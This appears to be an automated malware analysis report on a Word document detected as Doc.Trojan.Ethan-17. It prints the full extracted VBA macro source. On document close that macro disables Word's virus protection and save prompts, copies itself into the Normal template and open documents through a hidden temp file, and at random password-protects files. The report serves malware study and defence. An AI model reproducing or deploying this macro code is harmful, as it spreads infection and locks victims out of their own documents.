MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a Microsoft Word document containing VBA macros. The macros attempt to disable virus protection and persist by copying themselves to the Normal template or the active document, using the temporary file 'c:\windows\temp\wrdtmpa.tmp'. The ClamAV heuristic also flags this as Doc.Trojan.Ethan-17, indicating a known malicious document.
Heuristics 2
-
ClamAV: Doc.Trojan.Ethan-17 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ethan-17
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2986 bytes |
SHA-256: bd9751a0c573e67741ac0ffd834031f6e869b7f28dc6a9bc2d0c80b1046772c0 |
|||
|
Detection
ClamAV:
Doc.Trojan.Ethan-17
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Application.EnableCancelKey = wdCancelDisabled
With Options
.VirusProtection = False
.AllowFastSave = True
.BackgroundSave = True
.CreateBackup = False
.SavePropertiesPrompt = False
.SaveNormalPrompt = False
End With
Call Test_Pritomnosti
Call Akce
ActiveDocument.Save
End Sub
Private Sub Test_Pritomnosti()
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then _
Call Instaluj_Do_Sablony
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then _
Call Instaluj_do_Dokumentu
End Sub
Private Sub Instaluj_Do_Sablony()
Call Tmp_File
Open "c:\windows\temp\wrdtmpa.tmp" For Input As #1
If LOF(1) = 0 Then GoTo konec
i = 1
Do While Not EOF(1)
Line Input #1, a
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, a
i = i + 1
Loop
konec:
Close #1
Kill "c:\windows\temp\wrdtmpa.tmp"
End Sub
Private Sub Instaluj_do_Dokumentu()
Call Tmp_File
Open "c:\windows\temp\wrdtmpa.tmp" For Input As #1
If LOF(1) = 0 Then GoTo konec
i = 1
Do While Not EOF(1)
Line Input #1, a
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, a
i = i + 1
Loop
konec:
Close #1
Kill "c:\windows\temp\wrdtmpa.tmp"
End Sub
Private Sub Tmp_File()
Open "c:\windows\temp\wrdtmpa.tmp" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\windows\temp\wrdtmpa.tmp", 6
End Sub
Private Sub Akce()
Dim Mesic, rok
Mesic = Month(Date)
rok = Year(Date)
If (Mesic = 3) Then GoTo konec 'Brezen mesic internetu - March is month of internet!
If Rnd > 0.4 Then GoTo konec
With ActiveDocument
.Password = "DArk![FA]"
.WritePassword = ""
End With
With Dialogs(wdDialogFileSummaryInfo): _
.Title = "Easter Surprise v1.1": _
.Author = "DArk!, ISŠE": _
.Keywords = "CZECH MADE!": _
.Execute
End With
Application.DefaultSaveFormat = ""
ActiveDocument.Save
konec:
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Application.EnableCancelKey = wdCancelDisabled
With Options
.VirusProte
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.